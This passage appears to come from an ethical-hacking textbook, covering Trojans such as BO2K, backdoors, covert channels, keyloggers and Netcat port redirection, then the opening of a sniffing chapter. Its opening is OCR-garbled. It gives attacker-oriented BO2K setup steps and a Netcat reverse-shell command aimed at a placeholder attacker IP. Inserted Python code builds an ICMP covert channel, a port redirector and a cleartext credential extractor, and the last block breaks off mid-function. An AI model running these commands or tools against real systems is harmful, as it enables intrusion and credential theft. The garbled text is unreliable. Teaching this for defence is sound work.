With new plug-ins and features being added all the lime, B02K is an obvious choice for the productive ne t wo r k ad m in is tr a 1 < > r, ” An In-Depth Look at 802K Whether you consider it a Trojan or a “remote administrator tool.” the capabilities of BOK2 are fairly extensive for something of this type. This list of features is adapted from the manufacturer’s Web site: Client Features • Address book style server list • Functionality can be extended via the use of plug-ins. • Multiple simul taneo u s s erver connections • Session logging capability • Native Server Support ■ Key loggingcap ability • Hypertext Transfer Protocol (HTTP) file system browsing and transfer • Microsoft Networking file sharing • Remote registry editing • F ile b row si n g, t ra n sfe r. a n d m a n a gem en t • Plug-in extensibility • Remote upgrading H installation, and un installation • Network redirection of Transfer Control Protocol /Inter net Protocol (TCP /IP) connections • ■ Access console programs such as command shells through Telnet • Multimedia support for audio/video capture, and audio playback • Window’s NT registry passwords and Win9x screen saver password dumping • Process control, start, stop, list • ■ Multiple client connections over any medium • GUI m es sa ge pro m pts 264 PART 2 A Technical Overview of Hacking » Proprietary rile compression • Remote reboot » Domain Name Service (DNS) n ei in e resolution Features Added by Plug-ins • Cryptographically Strong Triple-DES encryption • Re m ote d eskto p wi t h op tion ei 1 m o use and key tao a rd c o n tro I • Drag and drop encrypted file transfers and Explorer-like lilesyslem browsing • Graphical rem ote r eg is try ed i ling • Reliable User datagram protocol (UDP) Eind Internet Control Message Protocol (ICMP) communications protocols • Back Orifice 20(H) (1302K) is a next generation tool that was designed to accept customized, specially designed plug-ins. B02K represents a dangerous tool in the wrong hands. 
With the software’s ability to be configured to carry out a diverse set of tasks at the attacker’s behest, it can be a devastating tool. B02K consists of two software components in the form of a client and a server. To use the R02.K server, the configuration is as follows: 1. Start the B02K, Wizard and click Next when the Wizard’s splash screen appears. • When prompted by the Wizard, enter the server executable to be edited, • Choose the protocol to run the server communication over. • The typical choice is to use TCP as the protocol due toils inherent robustness. UDP is typically used if a firewall or other security architecture needs to be traversed. 1. After choosing to use TCP to control the B02K server the next screen queries the port number that will be used, Port 80 is generally open, and so it’s the one most often used H but any open port can be used. 1. In the next screen, enter a password that will be used to access the server. Note that passwords can be used but the attacker could choose open authentication that w T ould mean that anyone could access without having to supply credentials of any kind. 1. The server configuration tool is provided with the information the attacker has entered when the W’izard finishes. • The server can then be configured to start when the system starts up. • This will allow the program to restart every lime the system is rebooted, preventing the program from becoming unavailable. 1. Click Save Server to save the changes and commit them to the server. CHAPTER 11 Trojans and Backdoors 265 Once the server is configured it Is now ready to be installed on the victim’s system. 
No matter how the installation is to tEike place, the only applicEilion that needs to be run on the target system is the B02K executable, Once this application is run, the victim’s system will have the port that was configured previously opened on their system and he ready to accepi input from I b e all ticker In addition the application runs an executable file called I’mgr }2,exe and places it in the Windows system 3 2 folder. Additionally, if you configured the BQ2K executable to run in stealth mode, it wit I not show up in Task Manager as it modifies an existing running process to act as its cover, If stealth was not configured, the application will show up as a Remote Administration Service. Stealth or no stealth, the result is the same: The attacker now has a foothold on the victim’s system. Distribution Methods Configuring and creating Trojans has become very simple; the process of getting them onto the victim’s system is the hard part. In today’s environment users have become much more cautious than previously and generally are less likely to click on attachments and files they are suspicious of. Additionally, most systems include antivirus software that is designed to detect behavior that is the signature of Trojans. Tactics that used to work will not be as successful today. To counter this change, tools are available that can be used to slip a dangerous pay load pas I li victim s defenses. With i he tools discussed briefly in I his seel ion together wit Ji knowledge of how a Trojan works, it is possible for even a novice to create an effective mechanism to deliver a pay load on target. Using Wrappers to Install Trojans One such application to deliver this type of pay load is known as wrappers. Using wrappers, attackers can lake l heir intended pay load and merge it with a harmless executable to create a single executable from the two. At this point, the new executable can be posted in some Location where it is likely to be downloaded. 
Consider a situation where a would-be attacker downloads an authentic application from a vendor’s Web site and uses wrappers to merge a Trojan (that is, BG2K) into the application before posting it on a newsgroup or other location, Some more advanced wrapper-style programs can even bind together several applications instead of the tw T o mentioned here. What looks harmless to the downloader is actually a “bomb” waiting to go off on the system. When the victim runs the infected software, the in fee tor installs and takes over the system. NOTE This scenario is similar to what can and does happen with software downloaded from so-called J ‘warez’ r sites. In this instance an attacker down toads a legitimate program, embeds a pay load into it, and posts it on file-sharing networks such as SitTorrent. Someone looking to get the new software free instead of paying for a legitimate copy actually gets a nasty surprise. 266 PART 2 A Technical Overview of Hacking Wrappers tend to be one of the tools of choice for script kiddies due to their reltitive ease of use and their overall accessibility. 1 1 tickers in this category find them effective for their purposes. Some of the better-known wrapper programs are the following: • EliteWrap — Elite Wrap isoneofthe most popular wrapping tools available due to its rich feature set that includes the ability to perform redundancy checks on merged files to make sure the process went properly and the ability to check if the software will install as expected. Furthermore the software can even be configured to the point of letting the attacker choose an installation directory for the pay load. Finally* software wrapped with EliteWrap can be configured to install silently without any user interaction, Saran Wrap — A wrapper program specifically designed to work wUh and hide Back Orifice, it can bundle Back Orifice with an existing program into what appears to be a standard “Install Shield” installed program. 
• Trojan Man — This wrapper merges programs and can encrypt the new package in order to bypass antivirus programs.
• Teflon Oil Patch — Another program designed to bind Trojans to a specified file in order to defeat Trojan detection applications.
• Restorator — An example of an application designed originally with the best of intentions but now used for less than honorable purposes. It has the ability to add a payload to a package, such as a screen saver, before it is forwarded to the victim.
• Firekiller 2000 — A tool designed to be used with other applications when wrapped. This application is designed to disable firewall and antivirus software. Programs such as Norton AntiVirus and McAfee VirusScan were vulnerable targets prior to being patched.

Trojan Construction Kits

One of the other tools that have emerged over the past few years is the Trojan construction kit. The purpose of these kits is to assist in the development of new Trojans. The emergence of these kits has made the process of creating Trojans so easy that even those with knowledge equivalent to the average script kiddie can create new and dangerous entities without much effort at all. Several of these tools are shown in the following:

• The Trojan Construction Kit — One of the best examples of a relatively easy to use, but potentially destructive, tool. This kit is command line based, which may make it a little less accessible to the average person, but it is nonetheless very capable in the right hands. With a little bit of effort it is possible to build a Trojan that can engage in such destructive behavior as destroying partition tables, master boot records (MBRs), and hard drives.
• Senna Spy — Another Trojan creation kit that is capable of custom options, such as file transfer, executing DOS commands, keyboard control, and listing and controlling processes.
• Stealth Tool — A program used not to create Trojans, but to assist them in hiding.
In practice, this tool is used to alter the target file by moving bytes, changing headers, splitting files, and combining files.

Backdoors

Many attackers gain access to their target system through something known as a backdoor. The owner of a system compromised in this way may have no indication that someone else is even using the system. Typically a backdoor, when implemented, will achieve one or more of three key goals:

• Provide the ability to access a system regardless of security measures that an administrator may take to prevent such access
• Provide the ability to gain access to a system while keeping a low profile. This would allow an attacker to access a system and circumvent logging and other detective methods.
• Provide the ability to access a system with minimal effort in the minimum amount of time. Under the right conditions a backdoor will allow the attacker to gain access to a system without having to "re-hack."

Some common backdoors that are placed on a system are of the following types and purposes:

• Password-cracking backdoor — Backdoors of this type rely on an attacker uncovering and exploiting weak passwords that have been configured by the system owner. System owners who fail to follow accepted guidelines for making strong passwords become vulnerable to attacks of this type. A password-cracking backdoor in fact may be the first attack an aggressor will attempt, as it provides access to a known account. In the event another account was used to crack the password, the system owner may find this account and shut it down; however, with the other account compromised the attacker will still have access.
• Rootkits — Another type of backdoor that can be created on a system is caused by attackers replacing existing files on the system with their own versions. Using this technique, an attacker can replace key system files on a computer and therefore alter the behavior of a system at a fundamental level.
This type of attack uses a specially designed piece of software known as a rootkit that replaces these files with different versions. Once this process has been carried out, the system will do something or behave differently than designed, and once this is the case, getting trustworthy information from the system itself becomes questionable.
• Services backdoor — Network services are another target for attack and modification with a backdoor. Understanding how a service runs is important to understanding this attack. When a service runs, as explained previously, the process listens on a port, such as port 80. Once a service is answering on a port, an attacker can attach to the port and issue commands to the service that has been compromised. There are different ways for an attacker to get the compromised service onto the system, but in all such cases the service installed is one that the attacker has modified and configured for his or her purpose.
• Process-hiding backdoors — An attacker wanting to stay undetected for as long as possible will typically choose to go the extra step of hiding the software he or she is running. Programs such as a compromised service, password crackers, sniffers, and rootkits are items that an attacker will want to configure so as to avoid detection and removal. Techniques include renaming a package to the name of a legitimate program or altering other files on a system to prevent them from being detected and running.

Once a backdoor is in place, an attacker can access and manipulate the system at will.

Covert Communication

An item of concern for a security professional is the covert channel and the danger it poses. Covert channels are capable of transferring information using a mechanism that was not designed for the purpose.
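The ICMP tunnels discussed later in this section (Loki, 007Shell) are the textbook network instance of such a mechanism: the data field of an echo request was meant to be padding that the peer echoes back, not a message carrier. The following added example, written for this page rather than taken from the book or from any of those tools, builds the ICMP layer of such a channel: it splits a message across echo-request payloads sized like an ordinary ping so the packets do not stand out on length alone, and reassembles them on the other side using the identifier and sequence fields. PING_PAYLOAD_LEN of 56 bytes is an assumption matching common ping defaults; IP encapsulation and raw-socket transmission are left out so the code runs offline.

```python
import struct

ICMP_ECHO_REQUEST = 8
ICMP_HEADER_LEN = 8
PING_PAYLOAD_LEN = 56            # assumption: default payload size of a common ping client
CHUNK_LEN = PING_PAYLOAD_LEN - 2  # two payload bytes carry the length of the real data


def inet_checksum(data: bytes) -> int:
    """RFC 1071 one's-complement checksum as used by ICMP."""
    if len(data) % 2:
        data += b"\0"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF


def build_echo_request(ident: int, seq: int, payload: bytes) -> bytes:
    """Type 8, code 0 echo request with a valid checksum over header + payload."""
    header = struct.pack("!BBHHH", ICMP_ECHO_REQUEST, 0, 0, ident, seq)
    csum = inet_checksum(header + payload)
    return struct.pack("!BBHHH", ICMP_ECHO_REQUEST, 0, csum, ident, seq) + payload


def parse_echo(packet: bytes):
    """Return (type, ident, seq, payload); a damaged packet raises ValueError."""
    if len(packet) < ICMP_HEADER_LEN:
        raise ValueError("truncated ICMP packet")
    if inet_checksum(packet) != 0:       # a correct checksum verifies to zero
        raise ValueError("bad ICMP checksum")
    typ, _code, _csum, ident, seq = struct.unpack("!BBHHH", packet[:ICMP_HEADER_LEN])
    return typ, ident, seq, packet[ICMP_HEADER_LEN:]


def encode_message(message: bytes, ident: int) -> list:
    """Sender side: one 'ping' per chunk, payload = <len:2><chunk><zero padding to 56>."""
    packets = []
    for seq, start in enumerate(range(0, len(message), CHUNK_LEN), start=1):
        chunk = message[start:start + CHUNK_LEN]
        payload = struct.pack("!H", len(chunk)) + chunk
        payload += b"\0" * (PING_PAYLOAD_LEN - len(payload))
        packets.append(build_echo_request(ident, seq, payload))
    return packets


def decode_message(packets, ident: int) -> bytes:
    """Receiver side: keep echo requests carrying our identifier, reorder by seq, strip padding."""
    pieces = {}
    for pkt in packets:
        typ, pkt_ident, seq, payload = parse_echo(pkt)
        if typ != ICMP_ECHO_REQUEST or pkt_ident != ident:
            continue                     # ordinary ping traffic, not part of the channel
        (length,) = struct.unpack("!H", payload[:2])
        pieces[seq] = payload[2:2 + length]
    return b"".join(pieces[s] for s in sorted(pieces))


if __name__ == "__main__":
    pkts = encode_message(b"cat /etc/shadow | head -3", ident=0x1234)
    print(len(pkts), "packet(s) of", len(pkts[0]), "bytes each")
    print(decode_message(pkts, 0x1234))
```

The detection angle follows from the same code: a legitimate ping client repeats a fixed padding pattern in every request, so echo requests whose payload changes from packet to packet under one identifier, or whose payload does not match the expected pattern, are what an IDS rule for this class of tunnel looks for.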
When a covert channel is in use, information is typically being transferred in the open, but hidden within that information is the information that the sender and receiver wish to keep confidential. The beauty of this process is that unless you are looking for the information that is hidden, you will not be able to find it. Additionally, the Trusted Computer System Evaluation Criteria (TCSEC) defines two specific types of covert channels, known as storage and timing channels:

• Covert storage channels — Include all mechanisms or processes that facilitate the direct or indirect writing of data to a location by one service and the direct or indirect reading of it by another. These channels involve writing to a storage location (such as a hard disk or flash drive, or an unused field in a protocol header) by one process and the subsequent accessing and reading of that location by a different process or service.
• Covert timing channels — Send their information by manipulating resource usage on the system (for example, memory usage) to send a signal to a listening process. This attack is carried out by passing unauthorized information through the manipulation of the use of system resources (for example, changing the amount of CPU time or memory usage). One process will manipulate system resources in a specific, predefined way, and these responses will be interpreted by a second process or service.

The term covert channel was coined by Lampson in 1973 and is defined as "mechanisms not intended for information transfer of any sort, such as the service program's effect on system load." This definition specifically differentiates covert channels from the normal mechanisms used to transfer information.

Tools to exploit covert channels include:

• Loki — Was originally designed to be a proof of concept on how ICMP traffic can be used as a covert channel.
This tool is used to pass information inside of ICMP echo packets, whose data field can carry an arbitrary payload but normally holds only padding. Since the ability to carry data is there already, but not used for anything meaningful, this makes an ideal covert channel.
• ICMP Backdoor — Similar to Loki, but instead of using ping echo requests it uses ping echo replies.
• 007Shell — Uses ICMP packets to send information, but goes the extra step of formatting the packets so they are normal in size.
• B0CK — Similar to Loki, but uses IGMP instead of ICMP.
• Reverse World Wide Web (WWW) Tunneling Shell — Creates covert channels through firewalls and proxies by masquerading as normal Web traffic.
• AckCmd — This program provides a command shell on Windows systems. Covert communication occurs via TCP ACK segments.

The Role of Keyloggers

Another powerful way of extracting information from a victim's system is to use a piece of technology known as a keylogger. Software in this category is designed to capture and report activity on the system in the form of keyboard usage on a target system. When placed on a system it gives the attacker the ability to monitor all keyboard activity on the system and have it reported back to the attacker. Under the right conditions this software can capture passwords, confidential information, and other data. Typically keyloggers are implemented one of two ways: hardware or software. In software-based versions, the device is implemented as a small piece of code that resides in the interface between the operating system and keyboard. The software is typically installed the same way any other Trojan would be: bundled with something else and made available to the victim, who then installs it and becomes infected. Once the software is installed, the attacker receives all the information he or she is looking for.

NOTE Keyloggers are a sticky situation for companies and other organizations wishing to use them to monitor employee activities.
In most, but not all, cases notifications must be made to the user base letting them know that they may be monitored, and consent to such monitoring must be sought. If the company wants to capture illegal or illicit activity, notifying the users may make such a task difficult to accomplish. In a few cases, installing a keylogger on a system without telling the user of that system that he or she was being monitored compromised a whole case.

Of course, under the right conditions software-based keyloggers can be detected, so an alternative method is available in the form of hardware-based keyloggers. Hardware-based keyloggers can be plugged into a universal serial bus (USB) or PS/2 port on a system and monitor the passing signals for keystrokes. What makes hardware keyloggers particularly nasty is the fact that they are hard to detect unless you visually scan for them. Consider the fact that most computer users never look at the back of their system and you have a recipe for disaster.

Some hardware keyloggers have become even more advanced in how they are placed on a system. Recent developments in this area have included the ability to embed the keylogger hardware into a keyboard that looks no different from a regular keyboard. A user looking for a device sticking out of the back of the system would never find these types of keyloggers, as there isn't anything sticking out of the back of the system.

Software

Some of the keystroke recorders include:

• IKS Software Keylogger — A Windows-based keylogger that runs in the background on a system at a very low level. Due to the way this software is designed and runs on a system, it is very hard to detect using most conventional means. The program is designed to run at such a low level that it will not show up in process lists or through normal detection methods.
• Ghost Keylogger — Another Windows-based keylogger that is designed to run silently in the background on a system, much like IKS. The difference between this software and IKS is the ability to record activity to an encrypted log that can be e-mailed to the attacker.
• Spector Pro — Designed to capture keystroke activity, e-mail passwords, chat conversations and logs, and instant messages.
• FakeGINA — This is an advanced keylogger that is very specific in its choice of targets. This software component is designed to capture usernames and passwords from a Windows system, specifically by intercepting the communication between the Winlogon process and the logon GUI (the GINA) in Windows.

Port Redirection

One common way to exploit the power of covert channels is to use a process known as port redirection. Port redirection is a process where communications are redirected to different ports than they would normally be destined for. In practice this means traffic that is destined for one system is forwarded to another system.

When a packet is sent to a destination, it must have two things in place, an IP address and a port number, like so:

192.168.1.100:80

Or:

<ip_address>:<port_number>

If a packet is destined for a Web server on a system with the address 192.168.1.210 it would look like the following:

192.168.1.210:80

This would tell the packet to go to the IP address and access port 80, which, by default, is the port used for the Web server service. As was seen in a previous chapter, every system has 65,535 ports that can be accessed by services and used for communications. Some of these ports tend to be used more often than others. For example, HTTP uses port 80 and FTP uses port 21. In practice only those ports that will be used by applications should be available for use. Anything not explicitly in use should be blocked and typically is.
This poses a challenge for the hacker, one that can be overcome using the technique of port redirection. Port redirection is made possible by setting up a piece of software to listen on specified ports; when packets are received on these ports, the traffic is sent on to another system. Currently there are a myriad of tools available to do just this very thing, but the one we will look at more closely is Netcat.

Netcat is a simple command line utility available for Linux, UNIX, and Windows platforms. Netcat is designed to function by reading information from connections using TCP or UDP and doing simple port redirection on them as configured. Table 11-2 shows some of the options that can be used with Netcat. Netcat also has a close cousin known as Cryptcat, which adds the ability to encrypt the traffic it sends back and forth between systems. For the purposes of the discussion we will have here in this chapter, we will use Netcat.

TABLE 11-2 Options for Netcat.

SWITCH              DESCRIPTION
nc -d               Used to detach Netcat from the console
nc -l -p [port]     Used to create a simple listening TCP port; adding -u will place it into UDP mode
nc -e [program]     Used to redirect stdin/stdout from a program
nc -w [timeout]     Used to set a timeout before Netcat automatically quits
program | nc        Used to pipe output of program to Netcat
nc | program        Used to pipe output of Netcat to program
nc -h               Used to display help options
nc -v               Used to put Netcat into verbose mode
nc -g or nc -G      Used to specify source routing flags
nc -t               Used for Telnet negotiation
nc -o [file]        Used to hex dump traffic to file
nc -z               Used for port scanning

Let us take a look at the steps involved to use Netcat to perform port redirection. The first step is for the hacker to set up what is known as a listener on his or her system. This prepares the attacker's system to receive the information from the victim's system.
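The redirector described above (listen on one port, forward whatever arrives to another host and port) is what Datapipe and Fpipe do and what a Netcat listener chained to a second Netcat achieves. The following is an added example written for this page, not code from the book or from any of those tools: a minimal TCP port redirector in Python, together with a constructed echo service standing in for the "real" target so the whole thing can be exercised on the loopback interface. All addresses and ports are local and arbitrary; a bound port of 0 lets the operating system pick a free one.

```python
import socket
import threading


def _pump(src: socket.socket, dst: socket.socket) -> None:
    """Copy bytes from src to dst until src closes, then half-close dst so EOF propagates."""
    try:
        while True:
            data = src.recv(4096)
            if not data:
                break
            dst.sendall(data)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass


def _relay_connection(client: socket.socket, target) -> None:
    """Bridge one accepted client to the real target in both directions."""
    try:
        upstream = socket.create_connection(target, timeout=5)
    except OSError:
        client.close()
        return
    upstream.settimeout(None)
    back = threading.Thread(target=_pump, args=(upstream, client), daemon=True)
    back.start()
    _pump(client, upstream)
    back.join()
    client.close()
    upstream.close()


def start_redirector(listen_host: str, listen_port: int, target) -> socket.socket:
    """Listen on listen_host:listen_port and forward every connection to target=(host, port).

    Returns the listening socket: getsockname()[1] gives the bound port and
    close() stops the accept loop.
    """
    server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    server.bind((listen_host, listen_port))
    server.listen(16)

    def accept_loop():
        while True:
            try:
                client, _peer = server.accept()
            except OSError:
                return                       # listener was closed
            threading.Thread(target=_relay_connection, args=(client, target), daemon=True).start()

    threading.Thread(target=accept_loop, daemon=True).start()
    return server


def start_echo_server(host: str = "127.0.0.1") -> socket.socket:
    """Constructed stand-in for the service behind the redirector: echoes until the client half-closes."""
    server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    server.bind((host, 0))
    server.listen(16)

    def serve():
        while True:
            try:
                conn, _ = server.accept()
            except OSError:
                return
            with conn:
                while True:
                    data = conn.recv(4096)
                    if not data:
                        break
                    conn.sendall(data)

    threading.Thread(target=serve, daemon=True).start()
    return server


def send_through(port: int, message: bytes, host: str = "127.0.0.1") -> bytes:
    """Client side: send message, half-close, and collect everything relayed back."""
    with socket.create_connection((host, port), timeout=5) as s:
        s.sendall(message)
        s.shutdown(socket.SHUT_WR)
        chunks = []
        while True:
            data = s.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks)


if __name__ == "__main__":
    echo = start_echo_server()
    relay = start_redirector("127.0.0.1", 0, ("127.0.0.1", echo.getsockname()[1]))
    print(send_through(relay.getsockname()[1], b"hello through the redirector"))
    relay.close()
    echo.close()
```

From the defender's side, the point to notice is that the service behind the redirector only ever sees connections from the relay host, so connection logs on the final target no longer identify the real client; correlating the relay host's own connection table (netstat) with the target's logs is what exposes the hop.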
NOTE Netcat works fine on its own, but consider using Cryptcat if you want the extra protection that comes with encrypting your communication.

To set up a listener, the command would be as follows:

nc -v -l -p 80

After this, the attacker would need to execute a command on the victim's system to redirect the traffic to his or her system. To accomplish this, the hacker executes the following command from the intended victim's system:

nc -n <hackers_ip> 80 -e cmd.exe

Once this is entered, the net effect would be that the command shell on the victim's system would be at the attacker's command prompt, ready for input as desired. Of course, Netcat has some other capabilities, including port scanning and placing files on a victim's system. Port scanning can be accomplished using the following command:

nc -v -z -w1 <ip_address> <start_port>-<end_port>

This command would scan a range of ports as specified. Of course, Netcat isn't the only available tool to do port redirection. Tools such as Datapipe and Fpipe can perform the same functions, albeit in different ways.

Software Protection

The best way to blunt the impact of Trojans is to stop them before they become an issue. When you become proactive instead of reactive, you can make management easier. Using all the tools available to you for prevention can make all the difference. Use of the following applications becomes a necessity when protecting a system:

• Antivirus — Having software in place that actively looks for infections and eradicates them is paramount. Several of the applications mentioned here as Trojans can be thwarted by an antivirus.
• Anti-spyware — This software works in concert with other forms of protection, looking for suspicious behavior and items such as keyloggers.
• Firewalls — Stopping communications between software such as clients and servers can block attacks quite easily and blunt the effect of Trojans in the event they get on the system.
• Updates — Updating software and systems is a key defensive strategy that can address defects in software such as browsers that can be exploited by attackers.
• Education — Knowing is half the battle, and educating your users on proper procedures and how to prevent infections can yield benefits that other methods cannot.

What do you do if you suspect you are a victim already? Your toolbox already holds a number of tools that can be used to capture the telltale signs of infection. These include the following:

• Task Manager — Provided with Windows and used to display detailed information about running processes
• ps — The command equivalent of Task Manager, which is used to display the currently running processes on UNIX/Linux systems
• Netstat — Displays active TCP connections, ports on which the computer is listening, Ethernet statistics, the IP routing table, IPv4 statistics, and more
• Tlist — A Windows-based tool used to list currently running processes on local or remote machines
• TCPView — A GUI tool from Sysinternals (formerly Winternals) that displays TCP and UDP endpoints along with the process that owns each one
• Process Viewer — A Windows graphical user interface (GUI) utility that displays data about running processes
• Inzider — Lists processes on a Windows system and the ports each one is listening on. Inzider is useful in locating Trojans that have injected themselves into other processes.

NOTE Remember that if you suspect a system is infected or a piece of media is compromised in any way, the tools noted here should not be run from that location. Doing so can mean that the tool you are running may actually be infected or altered in some way to prevent your detecting the compromise.

CHAPTER SUMMARY

This chapter looked at one of the oldest forms of malware, known as the Trojan. Trojans are software applications that are designed to deliver control of a system to an attacker.
By design, Trojans are meant to be installed quickly and stealthily on a victim's system so as to avoid detection. Once a Trojan is installed successfully on a system, the next step most of them perform is to open a backdoor. Backdoors are openings put in place by an attacker to bypass the normal security measures that exist on a system. Once these constructs are in place the attacker has the ability to gain stealthy and unchecked access to a system for any purpose that they intended. Typically, this access is used for remote control, but it could be for data transfer or other purposes.

Working in concert with a backdoor are the covert and overt channels. A backdoor can be installed by a Trojan that will in turn provide a covert channel that can be used to avoid detection and the stopping of an attack. Covert channels represent mechanisms for transferring information between systems and processes in ways that they were not intended to do. With data and information being transmitted over unsupported channels, the problem becomes one of a lack of security measures, as unsupported channels may not be monitored the same way as supported ones are, if at all. Overt channels are the ways the data is expected to be transferred, but inside these channels an attacker can hide covert channels.

KEY CONCEPTS AND TERMS

Covert channels
Master boot records (MBR)
Overt channels
Port redirection
PS/2
Trojan construction kit
Trusted Computer System Evaluation Criteria (TCSEC)
Universal serial bus (USB)

CHAPTER 11 ASSESSMENT

1. Trojans are a type of malware.
A. True
B. False

2. Covert channels work over ________.
A. known channels
B. wireless
C. networks
D. security controls

3. Which of the following is one of the goals of Trojans?
A. Send data
B. Change system settings
C. Open overt channels
D. Give remote access

4. Backdoors are an example of covert channels.
A. True
B. False

5. ________ are methods for transferring data in an unmonitored manner.

6. Backdoors on a system can be used to bypass firewalls and other protective measures.
A. True
B. False

7. Trojans can be used to open backdoors on a system.
A. True
B. False

8. Trojans are designed to be small and stealthy in order to:
A. Bypass covert channels
B. Bypass firewalls
C. Bypass permissions
D. Bypass detection

CHAPTER 12 Sniffers, Session Hijacking, and Denial of Service Attacks

THIS CHAPTER FOCUSES ON three broad types of network attacks: sniffers, session hijacking, and denial of service (DoS) attacks. Each of these is a dangerous tool in the hands of a skilled attacker, so you must have a thorough understanding of each one.

The first discussion in this chapter is on the topic of sniffing, or observing communications on the network in either a passive or an active mode. With sniffing you can see what is being transmitted on the network unprotected and potentially intercept sensitive information to use against the network or system owner. Sniffers are designed to go after and compromise the confidentiality of data as it flows across the network, capturing this data and putting it in the hands of an unauthorized party.

An extension or upgrade to sniffing is the session hijack, which is a more aggressive and powerful weapon in the hacker's arsenal. A session hijack involves taking over an existing authenticated session and using it to monitor or manipulate the traffic and potentially execute commands on a system remotely. In its most advanced stages, session hijacking directly affects and attacks the integrity of information in an organization. Attackers using this technique can modify information at will, as they hold the credentials of the victim and can reach whatever the victim has access to.

Denial of service (DoS) is the third type of attack covered in this chapter. It generally involves one computer targeting another, seeking to shut it down and deny legitimate use of its services.
A distributed denial of service attack (DDoS) involves hundreds or even thousands of systems seeking to shut down a targeted system or a network. Such large-scale attacks are typically accomplished with the aid of botnets, networks of infected systems conscripted to do hackers' dirty work for them.

Chapter 12 Topics

This chapter covers the following topics and concepts:

• What sniffers are
• What session hijacking is
• What denial of service (DoS) is
• What distributed denial of service (DDoS) attacks are
• What botnets are

Chapter 12 Goals

When you complete this chapter, you will be able to:

• Describe the value of sniffers
• Describe the purpose of session hijacking
• Describe the process of DoS attacks
• Describe botnets
• List the capabilities of sniffers
• Describe the process of session hijacking
• Describe the features of a DoS attack

Sniffers

A sniffer is a valuable piece of software or a dangerous piece of software, depending on who is using the application. Before getting into a discussion of sniffers, it is necessary to understand what the program actually does. The simple definition of sniffers is that they are an application or device that is designed to capture, or "sniff," network traffic as it moves across the network itself. In the context of this book, sniffers are a technology used to steal or observe information that you may not otherwise have access to. A sniffer can give an attacker access to a large amount of information, including e-mail passwords, Web passwords, File Transfer Protocol (FTP) credentials, e-mail contents, and transferred files.

NOTE Like most technologies, sniffers are not inherently bad or evil; it all depends on the intent of the user of the technology. Sniffers in the hands of a network administrator can be used to diagnose network problems and uncover design problems in the network.
Sniffers rely on the inherent insecurity in networks and the protocols that are in use on them. Recall that the Transmission Control Protocol/Internet Protocol (TCP/IP) suite was designed for a more trusting time, and therefore the protocols do not offer much in the way of security. Several protocols lend themselves to easy sniffing:

• Telnet — Keystrokes, including those that make up usernames and passwords, are sent in the clear and can be easily sniffed.
• Hypertext Transfer Protocol (HTTP) — Designed to send information in the clear without any protection and, as such, a good target for sniffing.
• Simple Mail Transfer Protocol (SMTP) — Commonly used in the transfer of e-mail; the protocol is simple and efficient, but it does not include any protection against sniffing.
• Network News Transfer Protocol (NNTP) — All communication is sent in the clear, including passwords and data.
• Post Office Protocol (POP) — Designed to retrieve e-mail from servers, but again does not include protection against sniffing, as passwords and usernames can be intercepted.
• File Transfer Protocol (FTP) — A protocol designed to send and receive files; all transmissions, including credentials, are sent in the clear.
• Internet Message Access Protocol (IMAP) — Similar to POP in function and lack of protection.

Sniffers are a powerful part of the security professional's toolkit, offering the ability to peek into the traffic that is on the network and observe the communications that are taking place. How does a sniffer get this ability? Typically a computer system can see only the communications that are specifically addressed to it or from it, but a sniffer possesses the ability to see all communications, whether they are addressed to the listening station or not. This ability is made possible by switching the network card into promiscuous mode. Promiscuous mode is the ability of the network card to see all traffic and not just the traffic specifically addressed to it.
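What a promiscuous-mode capture actually hands the attacker for the cleartext protocols listed above is shown by the following added example, written for this page and not taken from the book or from any sniffer: it decodes an Ethernet II frame down through IPv4 and TCP to the application payload and pulls out FTP and POP3 USER/PASS commands and HTTP Basic credentials. The sample frames are constructed inline by make_frame with made-up MAC and IP addresses and zero checksums (the parser does not verify checksums); only FTP, POP3 and HTTP are handled, since Telnet keystrokes typically arrive one per segment and need stream reassembly first.

```python
import base64
import struct

ETHERTYPE_IPV4 = 0x0800
IPPROTO_TCP = 6


def parse_frame(frame: bytes) -> dict:
    """Decode Ethernet II -> IPv4 -> TCP and return addressing plus the TCP payload."""
    if len(frame) < 14:
        raise ValueError("truncated Ethernet frame")
    dst_mac, src_mac = frame[:6], frame[6:12]
    (ethertype,) = struct.unpack("!H", frame[12:14])
    if ethertype != ETHERTYPE_IPV4:
        raise ValueError("not an IPv4 frame")
    ip = frame[14:]
    ihl = (ip[0] & 0x0F) * 4                 # header length in bytes (options included)
    (total_len,) = struct.unpack("!H", ip[2:4])
    if ip[9] != IPPROTO_TCP:
        raise ValueError("not TCP")
    tcp = ip[ihl:total_len]
    sport, dport = struct.unpack("!HH", tcp[:4])
    data_off = (tcp[12] >> 4) * 4            # TCP header length, options included
    return {
        "src_mac": src_mac.hex(":"), "dst_mac": dst_mac.hex(":"),
        "src_ip": ".".join(map(str, ip[12:16])), "dst_ip": ".".join(map(str, ip[16:20])),
        "sport": sport, "dport": dport, "payload": tcp[data_off:],
    }


def extract_credentials(pkt: dict) -> list:
    """Return (protocol, kind, value) tuples for credentials visible in cleartext."""
    found = []
    text = pkt["payload"].decode("latin-1")
    port = pkt["dport"]
    if port in (21, 110):                    # FTP and POP3 share the USER/PASS syntax
        proto = "ftp" if port == 21 else "pop3"
        for line in text.splitlines():
            parts = line.split(" ", 1)
            if len(parts) == 2 and parts[0].upper() in ("USER", "PASS"):
                found.append((proto, parts[0].lower(), parts[1].strip()))
    elif port == 80:
        for line in text.split("\r\n"):
            if line.lower().startswith("authorization: basic "):
                token = line.split(" ", 2)[2].strip()
                try:
                    found.append(("http", "basic", base64.b64decode(token).decode("latin-1")))
                except ValueError:           # malformed base64: not a credential
                    pass
    return found


def make_frame(src_ip: str, dst_ip: str, sport: int, dport: int, payload: bytes) -> bytes:
    """Constructed sample frame for offline testing (made-up MACs, zero checksums)."""
    def mac(s):
        return bytes.fromhex(s.replace(":", ""))
    eth = mac("00:0c:29:aa:bb:02") + mac("00:0c:29:aa:bb:01") + struct.pack("!H", ETHERTYPE_IPV4)
    ip_hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 40 + len(payload), 1, 0x4000, 64, IPPROTO_TCP, 0,
                         bytes(map(int, src_ip.split("."))), bytes(map(int, dst_ip.split("."))))
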